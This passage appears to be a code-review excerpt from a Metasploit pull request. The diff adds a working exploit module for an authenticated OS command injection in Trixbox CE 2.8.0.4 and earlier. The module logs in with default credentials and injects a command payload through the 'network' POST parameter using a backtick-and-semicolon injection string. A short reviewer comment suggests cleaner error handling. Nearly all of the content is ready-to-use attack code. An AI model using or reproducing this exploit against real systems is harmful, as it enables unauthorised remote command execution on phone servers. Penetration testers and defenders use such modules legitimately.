modules/exploits/unix/webapp/trixbox_ce_endpoint_devicemap_rce.rb

```diff
@@ -0,0 +1,90 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'TrixBox CE endpoint_devicemap.php Authenticated Command Execution',
+        'Description' => %q{
+          This module exploits a post-authentication OS command injection vulnerability found in Trixbox CE <= v2.8.0.4
+          in the "network" POST parameter of the "/maint/modules/endpointcfg/endpoint_devicemap.php" page. 
+          Successful exploitation allows for arbitrary command execution on the underlying operating system as the "asterisk" user.
+        },
+        'Author' => [
+          # Obrela Labs Team - Discovery and Metasploit module
+          'Anastasios Stasinopoulos (@ancst)'
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix'],
+        'Arch' => ARCH_CMD,
+        'DisclosureDate' => 'Apr 28 2020',
+        'Privileged' => false,
+        'Payload' =>
+          {
+            'Compat' =>
+              {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'perl'
+              }
+          },
+        'Targets' =>
+          [
+            [ 'Trixbox CE <= v2.8.0.4', {}]
+          ],
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        OptString.new('HttpUsername', [ true, 'User to login with', 'maint']),
+        OptString.new('HttpPassword', [ true, 'Password to login with', 'password']),
+      ]
+    )
+  end
+
+  def exploit
+    uri = '/maint/modules/endpointcfg/endpoint_devicemap.php?lang=english'
+    user = datastore['HttpUsername']
+    pass = datastore['HttpPassword']
+    print_status("#{rhost}:#{rport} - Authenticating using \"#{user}:#{pass}\" credentials...")
+    begin
+      res = send_request_cgi({
+        'uri' => uri,
+        'method' => 'GET',
+        'authorization' => basic_auth(user, pass)
+      })
+      return if res.nil?
+
+      if res.code == 200
+        print_good("#{rhost}:#{rport} - Authenticated successfully.")
+      else
+        print_error("#{rhost}:#{rport} - Authentication failed.")
+        return
+      end
+    rescue ::Rex::ConnectionError
+      vprint_error('Failed to connect to the Trixbox CE host.')
+      return
+    end
+    begin
+      send_request_cgi({
+        'uri' => uri,
+        'method' => 'POST',
+        'authorization' => basic_auth(user, pass),
+        'vars_post' => {
+          'network' => ";`echo $(#{payload.encoded})`"
+        }
+      })
+    rescue ::Rex::ConnectionError
+      vprint_error('Failed to connect to the Trixbox CE host.')
+      return
```

Comment:
Rather than `vprint_error` and `return`, you can use fail_with.

```suggestion
      fail_with(Failure::Unreachable, 'Connection failed')
```

Reply:
done